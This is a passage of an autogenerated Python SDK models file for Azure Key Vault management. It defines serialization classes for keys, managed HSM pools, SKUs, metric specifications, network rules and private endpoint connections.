    :ivar exportable: Whether the private key can be exported.
    :vartype exportable: bool
    """

    _validation = {
        "created": {"readonly": True},
        "updated": {"readonly": True},
        "recovery_level": {"readonly": True},
    }

    _attribute_map = {
        "enabled": {"key": "enabled", "type": "bool"},
        "not_before": {"key": "nbf", "type": "int"},
        "expires": {"key": "exp", "type": "int"},
        "created": {"key": "created", "type": "int"},
        "updated": {"key": "updated", "type": "int"},
        "recovery_level": {"key": "recoveryLevel", "type": "str"},
        "exportable": {"key": "exportable", "type": "bool"},
    }

    def __init__(
        self,
        *,
        enabled: Optional[bool] = None,
        not_before: Optional[int] = None,
        expires: Optional[int] = None,
        exportable: Optional[bool] = None,
        **kwargs: Any
    ) -> None:
        """See the class docstring for the meaning of each keyword argument."""
        super().__init__(**kwargs)
        self.enabled = enabled
        self.not_before = not_before
        self.expires = expires
        self.exportable = exportable
        # Server-populated fields.
        self.created = None
        self.updated = None
        self.recovery_level = None
class KeyCreateParameters(_serialization.Model):
    """Parameters for creating a key.

    All required parameters must be populated in order to send to Azure.

    :ivar tags: Tags that will be assigned to the key.
    :vartype tags: dict[str, str]
    :ivar properties: Properties of the key to be created. Required.
    :vartype properties: ~azure.mgmt.keyvault.v2021_10_01.models.KeyProperties
    """

    _validation = {
        "properties": {"required": True},
    }

    _attribute_map = {
        "tags": {"key": "tags", "type": "{str}"},
        "properties": {"key": "properties", "type": "KeyProperties"},
    }

    def __init__(
        self, *, properties: "_models.KeyProperties", tags: Optional[Dict[str, str]] = None, **kwargs: Any
    ) -> None:
        """See the class docstring for the meaning of each keyword argument."""
        super().__init__(**kwargs)
        self.properties = properties
        self.tags = tags
class KeyListResult(_serialization.Model):
    """A single page of key resources.

    :ivar value: The keys on this page.
    :vartype value: list[~azure.mgmt.keyvault.v2021_10_01.models.Key]
    :ivar next_link: URL that retrieves the following page of keys.
    :vartype next_link: str
    """

    _attribute_map = {
        "value": {"key": "value", "type": "[Key]"},
        "next_link": {"key": "nextLink", "type": "str"},
    }

    def __init__(
        self, *, value: Optional[List["_models.Key"]] = None, next_link: Optional[str] = None, **kwargs: Any
    ) -> None:
        """
        :keyword value: The keys on this page.
        :paramtype value: list[~azure.mgmt.keyvault.v2021_10_01.models.Key]
        :keyword next_link: URL that retrieves the following page of keys.
        :paramtype next_link: str
        """
        super().__init__(**kwargs)
        self.next_link = next_link
        self.value = value
class KeyProperties(_serialization.Model):
    """Properties describing a key.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar attributes: Attributes of the key.
    :vartype attributes: ~azure.mgmt.keyvault.v2021_10_01.models.KeyAttributes
    :ivar kty: The key type; see JsonWebKeyType for valid values. Known values are: "EC", "EC-HSM",
     "RSA", and "RSA-HSM".
    :vartype kty: str or ~azure.mgmt.keyvault.v2021_10_01.models.JsonWebKeyType
    :ivar key_ops:
    :vartype key_ops: list[str or ~azure.mgmt.keyvault.v2021_10_01.models.JsonWebKeyOperation]
    :ivar key_size: The key size in bits, e.g. 2048, 3072, or 4096 for RSA.
    :vartype key_size: int
    :ivar curve_name: The elliptic curve name; see JsonWebKeyCurveName for valid values. Known
     values are: "P-256", "P-384", "P-521", and "P-256K".
    :vartype curve_name: str or ~azure.mgmt.keyvault.v2021_10_01.models.JsonWebKeyCurveName
    :ivar key_uri: URI of the current version of the key.
    :vartype key_uri: str
    :ivar key_uri_with_version: URI of this specific version of the key.
    :vartype key_uri_with_version: str
    """

    _validation = {
        "key_uri": {"readonly": True},
        "key_uri_with_version": {"readonly": True},
    }

    _attribute_map = {
        "attributes": {"key": "attributes", "type": "KeyAttributes"},
        "kty": {"key": "kty", "type": "str"},
        "key_ops": {"key": "keyOps", "type": "[str]"},
        "key_size": {"key": "keySize", "type": "int"},
        "curve_name": {"key": "curveName", "type": "str"},
        "key_uri": {"key": "keyUri", "type": "str"},
        "key_uri_with_version": {"key": "keyUriWithVersion", "type": "str"},
    }

    def __init__(
        self,
        *,
        attributes: Optional["_models.KeyAttributes"] = None,
        kty: Optional[Union[str, "_models.JsonWebKeyType"]] = None,
        key_ops: Optional[List[Union[str, "_models.JsonWebKeyOperation"]]] = None,
        key_size: Optional[int] = None,
        curve_name: Optional[Union[str, "_models.JsonWebKeyCurveName"]] = None,
        **kwargs: Any
    ) -> None:
        """
        :keyword attributes: Attributes of the key.
        :paramtype attributes: ~azure.mgmt.keyvault.v2021_10_01.models.KeyAttributes
        :keyword kty: The key type; see JsonWebKeyType for valid values. Known values are: "EC",
         "EC-HSM", "RSA", and "RSA-HSM".
        :paramtype kty: str or ~azure.mgmt.keyvault.v2021_10_01.models.JsonWebKeyType
        :keyword key_ops:
        :paramtype key_ops: list[str or ~azure.mgmt.keyvault.v2021_10_01.models.JsonWebKeyOperation]
        :keyword key_size: The key size in bits, e.g. 2048, 3072, or 4096 for RSA.
        :paramtype key_size: int
        :keyword curve_name: The elliptic curve name; see JsonWebKeyCurveName for valid values.
         Known values are: "P-256", "P-384", "P-521", and "P-256K".
        :paramtype curve_name: str or ~azure.mgmt.keyvault.v2021_10_01.models.JsonWebKeyCurveName
        """
        super().__init__(**kwargs)
        self.attributes = attributes
        self.kty = kty
        self.key_ops = key_ops
        self.key_size = key_size
        self.curve_name = curve_name
        # Server-populated, read-only fields.
        self.key_uri = None
        self.key_uri_with_version = None
class LogSpecification(_serialization.Model):
    """Describes a log specification for an operation.

    :ivar name: The log specification's name.
    :vartype name: str
    :ivar display_name: The log specification's display name.
    :vartype display_name: str
    :ivar blob_duration: The specification's blob duration.
    :vartype blob_duration: str
    """

    _attribute_map = {
        "name": {"key": "name", "type": "str"},
        "display_name": {"key": "displayName", "type": "str"},
        "blob_duration": {"key": "blobDuration", "type": "str"},
    }

    def __init__(
        self,
        *,
        name: Optional[str] = None,
        display_name: Optional[str] = None,
        blob_duration: Optional[str] = None,
        **kwargs: Any
    ) -> None:
        """
        :keyword name: The log specification's name.
        :paramtype name: str
        :keyword display_name: The log specification's display name.
        :paramtype display_name: str
        :keyword blob_duration: The specification's blob duration.
        :paramtype blob_duration: str
        """
        super().__init__(**kwargs)
        self.blob_duration = blob_duration
        self.display_name = display_name
        self.name = name
class ManagedHsmResource(_serialization.Model):
    """Base ARM resource for a managed HSM.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar id: Azure Resource Manager resource ID of the managed HSM Pool.
    :vartype id: str
    :ivar name: Name of the managed HSM Pool.
    :vartype name: str
    :ivar type: Resource type of the managed HSM Pool.
    :vartype type: str
    :ivar location: Supported Azure location in which to create the managed HSM Pool.
    :vartype location: str
    :ivar sku: SKU details.
    :vartype sku: ~azure.mgmt.keyvault.v2021_10_01.models.ManagedHsmSku
    :ivar tags: Resource tags.
    :vartype tags: dict[str, str]
    :ivar system_data: Metadata about creation and last modification of the key vault resource.
    :vartype system_data: ~azure.mgmt.keyvault.v2021_10_01.models.SystemData
    """

    _validation = {
        "id": {"readonly": True},
        "name": {"readonly": True},
        "type": {"readonly": True},
        "system_data": {"readonly": True},
    }

    _attribute_map = {
        "id": {"key": "id", "type": "str"},
        "name": {"key": "name", "type": "str"},
        "type": {"key": "type", "type": "str"},
        "location": {"key": "location", "type": "str"},
        "sku": {"key": "sku", "type": "ManagedHsmSku"},
        "tags": {"key": "tags", "type": "{str}"},
        "system_data": {"key": "systemData", "type": "SystemData"},
    }

    def __init__(
        self,
        *,
        location: Optional[str] = None,
        sku: Optional["_models.ManagedHsmSku"] = None,
        tags: Optional[Dict[str, str]] = None,
        **kwargs: Any
    ) -> None:
        """
        :keyword location: Supported Azure location in which to create the managed HSM Pool.
        :paramtype location: str
        :keyword sku: SKU details.
        :paramtype sku: ~azure.mgmt.keyvault.v2021_10_01.models.ManagedHsmSku
        :keyword tags: Resource tags.
        :paramtype tags: dict[str, str]
        """
        super().__init__(**kwargs)
        # Read-only fields, filled in by the service.
        self.id = None
        self.name = None
        self.type = None
        self.system_data = None
        # Client-settable fields.
        self.location = location
        self.sku = sku
        self.tags = tags
class ManagedHsm(ManagedHsmResource):
    """Managed HSM resource information with extended details.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar id: Azure Resource Manager resource ID of the managed HSM Pool.
    :vartype id: str
    :ivar name: Name of the managed HSM Pool.
    :vartype name: str
    :ivar type: Resource type of the managed HSM Pool.
    :vartype type: str
    :ivar location: Supported Azure location in which to create the managed HSM Pool.
    :vartype location: str
    :ivar sku: SKU details.
    :vartype sku: ~azure.mgmt.keyvault.v2021_10_01.models.ManagedHsmSku
    :ivar tags: Resource tags.
    :vartype tags: dict[str, str]
    :ivar system_data: Metadata about creation and last modification of the key vault resource.
    :vartype system_data: ~azure.mgmt.keyvault.v2021_10_01.models.SystemData
    :ivar properties: Properties of the managed HSM.
    :vartype properties: ~azure.mgmt.keyvault.v2021_10_01.models.ManagedHsmProperties
    """

    _validation = {
        "id": {"readonly": True},
        "name": {"readonly": True},
        "type": {"readonly": True},
        "system_data": {"readonly": True},
    }

    _attribute_map = {
        "id": {"key": "id", "type": "str"},
        "name": {"key": "name", "type": "str"},
        "type": {"key": "type", "type": "str"},
        "location": {"key": "location", "type": "str"},
        "sku": {"key": "sku", "type": "ManagedHsmSku"},
        "tags": {"key": "tags", "type": "{str}"},
        "system_data": {"key": "systemData", "type": "SystemData"},
        "properties": {"key": "properties", "type": "ManagedHsmProperties"},
    }

    def __init__(
        self,
        *,
        location: Optional[str] = None,
        sku: Optional["_models.ManagedHsmSku"] = None,
        tags: Optional[Dict[str, str]] = None,
        properties: Optional["_models.ManagedHsmProperties"] = None,
        **kwargs: Any
    ) -> None:
        """
        :keyword location: Supported Azure location in which to create the managed HSM Pool.
        :paramtype location: str
        :keyword sku: SKU details.
        :paramtype sku: ~azure.mgmt.keyvault.v2021_10_01.models.ManagedHsmSku
        :keyword tags: Resource tags.
        :paramtype tags: dict[str, str]
        :keyword properties: Properties of the managed HSM.
        :paramtype properties: ~azure.mgmt.keyvault.v2021_10_01.models.ManagedHsmProperties
        """
        # Base class handles location, sku, tags and the read-only ARM fields.
        super().__init__(location=location, sku=sku, tags=tags, **kwargs)
        self.properties = properties
class ManagedHsmError(_serialization.Model):
    """An error returned by the managed HSM service.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar error: The server error.
    :vartype error: ~azure.mgmt.keyvault.v2021_10_01.models.Error
    """

    _validation = {"error": {"readonly": True}}

    _attribute_map = {"error": {"key": "error", "type": "Error"}}

    def __init__(self, **kwargs: Any) -> None:
        """ """
        super().__init__(**kwargs)
        # Read-only; populated by the service.
        self.error = None
class ManagedHsmListResult(_serialization.Model):
    """A page of managed HSM Pools.

    :ivar value: The managed HSM Pools on this page.
    :vartype value: list[~azure.mgmt.keyvault.v2021_10_01.models.ManagedHsm]
    :ivar next_link: URL that retrieves the next set of managed HSM Pools.
    :vartype next_link: str
    """

    _attribute_map = {
        "value": {"key": "value", "type": "[ManagedHsm]"},
        "next_link": {"key": "nextLink", "type": "str"},
    }

    def __init__(
        self, *, value: Optional[List["_models.ManagedHsm"]] = None, next_link: Optional[str] = None, **kwargs: Any
    ) -> None:
        """
        :keyword value: The managed HSM Pools on this page.
        :paramtype value: list[~azure.mgmt.keyvault.v2021_10_01.models.ManagedHsm]
        :keyword next_link: URL that retrieves the next set of managed HSM Pools.
        :paramtype next_link: str
        """
        super().__init__(**kwargs)
        self.next_link = next_link
        self.value = value
class ManagedHsmProperties(_serialization.Model):  # pylint: disable=too-many-instance-attributes
    """Properties of a managed HSM Pool.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar tenant_id: Azure Active Directory tenant ID used to authenticate requests to the managed
     HSM pool.
    :vartype tenant_id: str
    :ivar initial_admin_object_ids: Object ids of the initial administrators of this managed hsm
     pool.
    :vartype initial_admin_object_ids: list[str]
    :ivar hsm_uri: URI of the managed hsm pool used for key operations.
    :vartype hsm_uri: str
    :ivar enable_soft_delete: Whether the 'soft delete' functionality is enabled for this managed
     HSM pool. Soft delete is enabled by default for all managed HSMs and is immutable.
    :vartype enable_soft_delete: bool
    :ivar soft_delete_retention_in_days: Soft deleted data retention days. A deleted HSM or key
     remains recoverable for the configured retention period, defaulting to 90 days. Accepted
     values lie between 7 and 90.
    :vartype soft_delete_retention_in_days: int
    :ivar enable_purge_protection: Whether protection against purge is enabled for this managed
     HSM pool. Setting this to true activates purge protection for the pool and its content - only
     the Managed HSM service may then initiate a hard, irrecoverable deletion. Enabling this
     functionality is irreversible.
    :vartype enable_purge_protection: bool
    :ivar create_mode: Indicates whether the resource is being created anew or recovered from a
     deleted resource. Known values are: "recover" and "default".
    :vartype create_mode: str or ~azure.mgmt.keyvault.v2021_10_01.models.CreateMode
    :ivar status_message: Resource Status Message.
    :vartype status_message: str
    :ivar provisioning_state: Provisioning state. Known values are: "Succeeded", "Provisioning",
     "Failed", "Updating", "Deleting", "Activated", "SecurityDomainRestore", and "Restoring".
    :vartype provisioning_state: str or ~azure.mgmt.keyvault.v2021_10_01.models.ProvisioningState
    :ivar network_acls: Rules controlling accessibility of the key vault from specific network
     locations.
    :vartype network_acls: ~azure.mgmt.keyvault.v2021_10_01.models.MHSMNetworkRuleSet
    :ivar private_endpoint_connections: Private endpoint connections associated with the managed
     hsm pool.
    :vartype private_endpoint_connections:
     list[~azure.mgmt.keyvault.v2021_10_01.models.MHSMPrivateEndpointConnectionItem]
    :ivar public_network_access: Controls access to the managed HSM from public networks. Known
     values are: "Enabled" and "Disabled".
    :vartype public_network_access: str or
     ~azure.mgmt.keyvault.v2021_10_01.models.PublicNetworkAccess
    :ivar scheduled_purge_date: The scheduled purge date in UTC.
    :vartype scheduled_purge_date: ~datetime.datetime
    """

    _validation = {
        "hsm_uri": {"readonly": True},
        "status_message": {"readonly": True},
        "provisioning_state": {"readonly": True},
        "private_endpoint_connections": {"readonly": True},
        "scheduled_purge_date": {"readonly": True},
    }

    _attribute_map = {
        "tenant_id": {"key": "tenantId", "type": "str"},
        "initial_admin_object_ids": {"key": "initialAdminObjectIds", "type": "[str]"},
        "hsm_uri": {"key": "hsmUri", "type": "str"},
        "enable_soft_delete": {"key": "enableSoftDelete", "type": "bool"},
        "soft_delete_retention_in_days": {"key": "softDeleteRetentionInDays", "type": "int"},
        "enable_purge_protection": {"key": "enablePurgeProtection", "type": "bool"},
        "create_mode": {"key": "createMode", "type": "str"},
        "status_message": {"key": "statusMessage", "type": "str"},
        "provisioning_state": {"key": "provisioningState", "type": "str"},
        "network_acls": {"key": "networkAcls", "type": "MHSMNetworkRuleSet"},
        "private_endpoint_connections": {
            "key": "privateEndpointConnections",
            "type": "[MHSMPrivateEndpointConnectionItem]",
        },
        "public_network_access": {"key": "publicNetworkAccess", "type": "str"},
        "scheduled_purge_date": {"key": "scheduledPurgeDate", "type": "iso-8601"},
    }

    def __init__(
        self,
        *,
        tenant_id: Optional[str] = None,
        initial_admin_object_ids: Optional[List[str]] = None,
        enable_soft_delete: bool = True,
        soft_delete_retention_in_days: int = 90,
        enable_purge_protection: bool = True,
        create_mode: Optional[Union[str, "_models.CreateMode"]] = None,
        network_acls: Optional["_models.MHSMNetworkRuleSet"] = None,
        public_network_access: Union[str, "_models.PublicNetworkAccess"] = "Enabled",
        **kwargs: Any
    ) -> None:
        """
        :keyword tenant_id: Azure Active Directory tenant ID used to authenticate requests to the
         managed HSM pool.
        :paramtype tenant_id: str
        :keyword initial_admin_object_ids: Object ids of the initial administrators of this managed
         hsm pool.
        :paramtype initial_admin_object_ids: list[str]
        :keyword enable_soft_delete: Whether the 'soft delete' functionality is enabled for this
         managed HSM pool. Soft delete is enabled by default for all managed HSMs and is immutable.
        :paramtype enable_soft_delete: bool
        :keyword soft_delete_retention_in_days: Soft deleted data retention days. A deleted HSM or
         key remains recoverable for the configured retention period, defaulting to 90 days.
         Accepted values lie between 7 and 90.
        :paramtype soft_delete_retention_in_days: int
        :keyword enable_purge_protection: Whether protection against purge is enabled for this
         managed HSM pool. Setting this to true activates purge protection for the pool and its
         content - only the Managed HSM service may then initiate a hard, irrecoverable deletion.
         Enabling this functionality is irreversible.
        :paramtype enable_purge_protection: bool
        :keyword create_mode: Indicates whether the resource is being created anew or recovered
         from a deleted resource. Known values are: "recover" and "default".
        :paramtype create_mode: str or ~azure.mgmt.keyvault.v2021_10_01.models.CreateMode
        :keyword network_acls: Rules controlling accessibility of the key vault from specific
         network locations.
        :paramtype network_acls: ~azure.mgmt.keyvault.v2021_10_01.models.MHSMNetworkRuleSet
        :keyword public_network_access: Controls access to the managed HSM from public networks.
         Known values are: "Enabled" and "Disabled".
        :paramtype public_network_access: str or
         ~azure.mgmt.keyvault.v2021_10_01.models.PublicNetworkAccess
        """
        super().__init__(**kwargs)
        self.tenant_id = tenant_id
        self.initial_admin_object_ids = initial_admin_object_ids
        self.enable_soft_delete = enable_soft_delete
        self.soft_delete_retention_in_days = soft_delete_retention_in_days
        self.enable_purge_protection = enable_purge_protection
        self.create_mode = create_mode
        self.network_acls = network_acls
        self.public_network_access = public_network_access
        # Read-only fields, populated only by the service.
        self.hsm_uri = None
        self.status_message = None
        self.provisioning_state = None
        self.private_endpoint_connections = None
        self.scheduled_purge_date = None
class ManagedHsmSku(_serialization.Model):
    """SKU details for a managed HSM Pool.

    All required parameters must be populated in order to send to Azure.

    :ivar family: SKU Family of the managed HSM Pool. Required. "B"
    :vartype family: str or ~azure.mgmt.keyvault.v2021_10_01.models.ManagedHsmSkuFamily
    :ivar name: SKU of the managed HSM Pool. Required. Known values are: "Standard_B1",
     "Custom_B32", and "Custom_B6".
    :vartype name: str or ~azure.mgmt.keyvault.v2021_10_01.models.ManagedHsmSkuName
    """

    _validation = {
        "family": {"required": True},
        "name": {"required": True},
    }

    _attribute_map = {
        "family": {"key": "family", "type": "str"},
        "name": {"key": "name", "type": "str"},
    }

    def __init__(
        self,
        *,
        family: Union[str, "_models.ManagedHsmSkuFamily"],
        name: Union[str, "_models.ManagedHsmSkuName"],
        **kwargs: Any
    ) -> None:
        """
        :keyword family: SKU Family of the managed HSM Pool. Required. "B"
        :paramtype family: str or ~azure.mgmt.keyvault.v2021_10_01.models.ManagedHsmSkuFamily
        :keyword name: SKU of the managed HSM Pool. Required. Known values are: "Standard_B1",
         "Custom_B32", and "Custom_B6".
        :paramtype name: str or ~azure.mgmt.keyvault.v2021_10_01.models.ManagedHsmSkuName
        """
        super().__init__(**kwargs)
        self.name = name
        self.family = family
class MetricSpecification(_serialization.Model):  # pylint: disable=too-many-instance-attributes
    """Describes a metric specification for an operation.

    :ivar name: The metric specification's name.
    :vartype name: str
    :ivar display_name: The metric specification's display name.
    :vartype display_name: str
    :ivar display_description: The metric specification's display description.
    :vartype display_description: str
    :ivar unit: The metric unit. Possible values include: 'Bytes', 'Count', 'Milliseconds'.
    :vartype unit: str
    :ivar aggregation_type: The metric aggregation type. Possible values include: 'Average',
     'Count', 'Total'.
    :vartype aggregation_type: str
    :ivar supported_aggregation_types: Aggregation types supported for the metrics.
    :vartype supported_aggregation_types: list[str]
    :ivar supported_time_grain_types: Time grain types supported for the metrics.
    :vartype supported_time_grain_types: list[str]
    :ivar lock_aggregation_type: The metric lock aggregation type.
    :vartype lock_aggregation_type: str
    :ivar dimensions: The metric's dimensions.
    :vartype dimensions: list[~azure.mgmt.keyvault.v2021_10_01.models.DimensionProperties]
    :ivar fill_gap_with_zero: Whether gaps should be filled with zero.
    :vartype fill_gap_with_zero: bool
    :ivar internal_metric_name: The internal metric name.
    :vartype internal_metric_name: str
    """

    _attribute_map = {
        "name": {"key": "name", "type": "str"},
        "display_name": {"key": "displayName", "type": "str"},
        "display_description": {"key": "displayDescription", "type": "str"},
        "unit": {"key": "unit", "type": "str"},
        "aggregation_type": {"key": "aggregationType", "type": "str"},
        "supported_aggregation_types": {"key": "supportedAggregationTypes", "type": "[str]"},
        "supported_time_grain_types": {"key": "supportedTimeGrainTypes", "type": "[str]"},
        "lock_aggregation_type": {"key": "lockAggregationType", "type": "str"},
        "dimensions": {"key": "dimensions", "type": "[DimensionProperties]"},
        "fill_gap_with_zero": {"key": "fillGapWithZero", "type": "bool"},
        "internal_metric_name": {"key": "internalMetricName", "type": "str"},
    }

    def __init__(
        self,
        *,
        name: Optional[str] = None,
        display_name: Optional[str] = None,
        display_description: Optional[str] = None,
        unit: Optional[str] = None,
        aggregation_type: Optional[str] = None,
        supported_aggregation_types: Optional[List[str]] = None,
        supported_time_grain_types: Optional[List[str]] = None,
        lock_aggregation_type: Optional[str] = None,
        dimensions: Optional[List["_models.DimensionProperties"]] = None,
        fill_gap_with_zero: Optional[bool] = None,
        internal_metric_name: Optional[str] = None,
        **kwargs: Any
    ) -> None:
        """
        :keyword name: The metric specification's name.
        :paramtype name: str
        :keyword display_name: The metric specification's display name.
        :paramtype display_name: str
        :keyword display_description: The metric specification's display description.
        :paramtype display_description: str
        :keyword unit: The metric unit. Possible values include: 'Bytes', 'Count', 'Milliseconds'.
        :paramtype unit: str
        :keyword aggregation_type: The metric aggregation type. Possible values include: 'Average',
         'Count', 'Total'.
        :paramtype aggregation_type: str
        :keyword supported_aggregation_types: Aggregation types supported for the metrics.
        :paramtype supported_aggregation_types: list[str]
        :keyword supported_time_grain_types: Time grain types supported for the metrics.
        :paramtype supported_time_grain_types: list[str]
        :keyword lock_aggregation_type: The metric lock aggregation type.
        :paramtype lock_aggregation_type: str
        :keyword dimensions: The metric's dimensions.
        :paramtype dimensions: list[~azure.mgmt.keyvault.v2021_10_01.models.DimensionProperties]
        :keyword fill_gap_with_zero: Whether gaps should be filled with zero.
        :paramtype fill_gap_with_zero: bool
        :keyword internal_metric_name: The internal metric name.
        :paramtype internal_metric_name: str
        """
        super().__init__(**kwargs)
        self.name = name
        self.display_name = display_name
        self.display_description = display_description
        self.unit = unit
        self.aggregation_type = aggregation_type
        self.supported_aggregation_types = supported_aggregation_types
        self.supported_time_grain_types = supported_time_grain_types
        self.lock_aggregation_type = lock_aggregation_type
        self.dimensions = dimensions
        self.fill_gap_with_zero = fill_gap_with_zero
        self.internal_metric_name = internal_metric_name
class MHSMIPRule(_serialization.Model):
    """A rule that grants a managed hsm pool accessibility from a specific ip address or ip range.

    All required parameters must be populated in order to send to Azure.

    :ivar value: An IPv4 address range in CIDR notation, such as '124.56.78.91' (simple IP address)
     or '124.56.78.0/24' (all addresses that start with 124.56.78). Required.
    :vartype value: str
    """

    _validation = {"value": {"required": True}}

    _attribute_map = {"value": {"key": "value", "type": "str"}}

    def __init__(self, *, value: str, **kwargs: Any) -> None:
        """
        :keyword value: An IPv4 address range in CIDR notation, such as '124.56.78.91' (simple IP
         address) or '124.56.78.0/24' (all addresses that start with 124.56.78). Required.
        :paramtype value: str
        """
        super().__init__(**kwargs)
        self.value = value
class MHSMNetworkRuleSet(_serialization.Model):
    """The set of rules that govern network accessibility of a managed hsm pool.

    :ivar bypass: Which traffic can bypass network rules: 'AzureServices' or 'None'. Defaults to
     'AzureServices' when unspecified. Known values are: "AzureServices" and "None".
    :vartype bypass: str or ~azure.mgmt.keyvault.v2021_10_01.models.NetworkRuleBypassOptions
    :ivar default_action: Action taken when no rule from ipRules and from virtualNetworkRules
     matches; only consulted after the bypass property has been evaluated. Known values are:
     "Allow" and "Deny".
    :vartype default_action: str or ~azure.mgmt.keyvault.v2021_10_01.models.NetworkRuleAction
    :ivar ip_rules: The IP address rules.
    :vartype ip_rules: list[~azure.mgmt.keyvault.v2021_10_01.models.MHSMIPRule]
    :ivar virtual_network_rules: The virtual network rules.
    :vartype virtual_network_rules:
     list[~azure.mgmt.keyvault.v2021_10_01.models.MHSMVirtualNetworkRule]
    """

    _attribute_map = {
        "bypass": {"key": "bypass", "type": "str"},
        "default_action": {"key": "defaultAction", "type": "str"},
        "ip_rules": {"key": "ipRules", "type": "[MHSMIPRule]"},
        "virtual_network_rules": {"key": "virtualNetworkRules", "type": "[MHSMVirtualNetworkRule]"},
    }

    def __init__(
        self,
        *,
        bypass: Optional[Union[str, "_models.NetworkRuleBypassOptions"]] = None,
        default_action: Optional[Union[str, "_models.NetworkRuleAction"]] = None,
        ip_rules: Optional[List["_models.MHSMIPRule"]] = None,
        virtual_network_rules: Optional[List["_models.MHSMVirtualNetworkRule"]] = None,
        **kwargs: Any
    ) -> None:
        """
        :keyword bypass: Which traffic can bypass network rules: 'AzureServices' or 'None'.
         Defaults to 'AzureServices' when unspecified. Known values are: "AzureServices" and
         "None".
        :paramtype bypass: str or ~azure.mgmt.keyvault.v2021_10_01.models.NetworkRuleBypassOptions
        :keyword default_action: Action taken when no rule from ipRules and from
         virtualNetworkRules matches; only consulted after the bypass property has been evaluated.
         Known values are: "Allow" and "Deny".
        :paramtype default_action: str or ~azure.mgmt.keyvault.v2021_10_01.models.NetworkRuleAction
        :keyword ip_rules: The IP address rules.
        :paramtype ip_rules: list[~azure.mgmt.keyvault.v2021_10_01.models.MHSMIPRule]
        :keyword virtual_network_rules: The virtual network rules.
        :paramtype virtual_network_rules:
         list[~azure.mgmt.keyvault.v2021_10_01.models.MHSMVirtualNetworkRule]
        """
        super().__init__(**kwargs)
        self.virtual_network_rules = virtual_network_rules
        self.ip_rules = ip_rules
        self.default_action = default_action
        self.bypass = bypass
class MHSMPrivateEndpoint(_serialization.Model):
    """Properties of a private endpoint object.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar id: Full identifier of the private endpoint resource.
    :vartype id: str
    """

    _validation = {"id": {"readonly": True}}

    _attribute_map = {"id": {"key": "id", "type": "str"}}

    def __init__(self, **kwargs: Any) -> None:
        """ """
        super().__init__(**kwargs)
        # Read-only; populated by the service.
        self.id = None
class MHSMPrivateEndpointConnection(ManagedHsmResource):  # pylint: disable=too-many-instance-attributes
    """A private endpoint connection resource.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar id: Azure Resource Manager resource ID of the managed HSM Pool.
    :vartype id: str
    :ivar name: Name of the managed HSM Pool.
    :vartype name: str
    :ivar type: Resource type of the managed HSM Pool.
    :vartype type: str
    :ivar location: Supported Azure location in which to create the managed HSM Pool.
    :vartype location: str
    :ivar sku: SKU details.
    :vartype sku: ~azure.mgmt.keyvault.v2021_10_01.models.ManagedHsmSku
    :ivar tags: Resource tags.
    :vartype tags: dict[str, str]
    :ivar system_data: Metadata about creation and last modification of the key vault resource.
    :vartype system_data: ~azure.mgmt.keyvault.v2021_10_01.models.SystemData
    :ivar etag: Changes whenever the state of the private endpoint connection changes.
    :vartype etag: str
    :ivar private_endpoint: Properties of the private endpoint object.
    :vartype private_endpoint: ~azure.mgmt.keyvault.v2021_10_01.models.MHSMPrivateEndpoint
    :ivar private_link_service_connection_state: Approval state of the private link connection.
    :vartype private_link_service_connection_state:
     ~azure.mgmt.keyvault.v2021_10_01.models.MHSMPrivateLinkServiceConnectionState
    :ivar provisioning_state: Provisioning state of the private endpoint connection. Known values
     are: "Succeeded", "Creating", "Updating", "Deleting", "Failed", and "Disconnected".
    :vartype provisioning_state: str or
     ~azure.mgmt.keyvault.v2021_10_01.models.PrivateEndpointConnectionProvisioningState
    """

    _validation = {
        "id": {"readonly": True},
        "name": {"readonly": True},
        "type": {"readonly": True},
        "system_data": {"readonly": True},
    }

    _attribute_map = {
        "id": {"key": "id", "type": "str"},
        "name": {"key": "name", "type": "str"},
        "type": {"key": "type", "type": "str"},
        "location": {"key": "location", "type": "str"},
        "sku": {"key": "sku", "type": "ManagedHsmSku"},
        "tags": {"key": "tags", "type": "{str}"},
        "system_data": {"key": "systemData", "type": "SystemData"},
        "etag": {"key": "etag", "type": "str"},
        "private_endpoint": {"key": "properties.privateEndpoint", "type": "MHSMPrivateEndpoint"},
        "private_link_service_connection_state": {
            "key": "properties.privateLinkServiceConnectionState",
            "type": "MHSMPrivateLinkServiceConnectionState",
        },
        "provisioning_state": {"key": "properties.provisioningState", "type": "str"},
    }

    def __init__(
        self,
        *,
        location: Optional[str] = None,
        sku: Optional["_models.ManagedHsmSku"] = None,
        tags: Optional[Dict[str, str]] = None,
        etag: Optional[str] = None,
        private_endpoint: Optional["_models.MHSMPrivateEndpoint"] = None,
        private_link_service_connection_state: Optional["_models.MHSMPrivateLinkServiceConnectionState"] = None,
        provisioning_state: Optional[Union[str, "_models.PrivateEndpointConnectionProvisioningState"]] = None,
        **kwargs: Any
    ) -> None:
        """
        :keyword location: Supported Azure location in which to create the managed HSM Pool.
        :paramtype location: str
        :keyword sku: SKU details.
        :paramtype sku: ~azure.mgmt.keyvault.v2021_10_01.models.ManagedHsmSku
        :keyword tags: Resource tags.
        :paramtype tags: dict[str, str]
        :keyword etag: Changes whenever the state of the private endpoint connection changes.
        :paramtype etag: str
        :keyword private_endpoint: Properties of the private endpoint object.
        :paramtype private_endpoint: ~azure.mgmt.keyvault.v2021_10_01.models.MHSMPrivateEndpoint
        :keyword private_link_service_connection_state: Approval state of the private link
         connection.
        :paramtype private_link_service_connection_state:
         ~azure.mgmt.keyvault.v2021_10_01.models.MHSMPrivateLinkServiceConnectionState
        :keyword provisioning_state: Provisioning state of the private endpoint connection. Known
         values are: "Succeeded", "Creating", "Updating", "Deleting", "Failed", and "Disconnected".
        :paramtype provisioning_state: str or
         ~azure.mgmt.keyvault.v2021_10_01.models.PrivateEndpointConnectionProvisioningState
        """
        # Base class handles location, sku, tags and the read-only ARM fields.
        super().__init__(location=location, sku=sku, tags=tags, **kwargs)
        self.etag = etag
        self.private_endpoint = private_endpoint
        self.private_link_service_connection_state = private_link_service_connection_state
        self.provisioning_state = provisioning_state
class MHSMPrivateEndpointConnectionItem(_serialization.Model):
    """An item describing a private endpoint connection.

    :ivar id: Id of the private endpoint connection.
    :vartype id: str
    :ivar etag: Changes whenever the state of the private endpoint connection changes.
    :vartype etag: str
    :ivar private_endpoint: Properties of the private endpoint object.
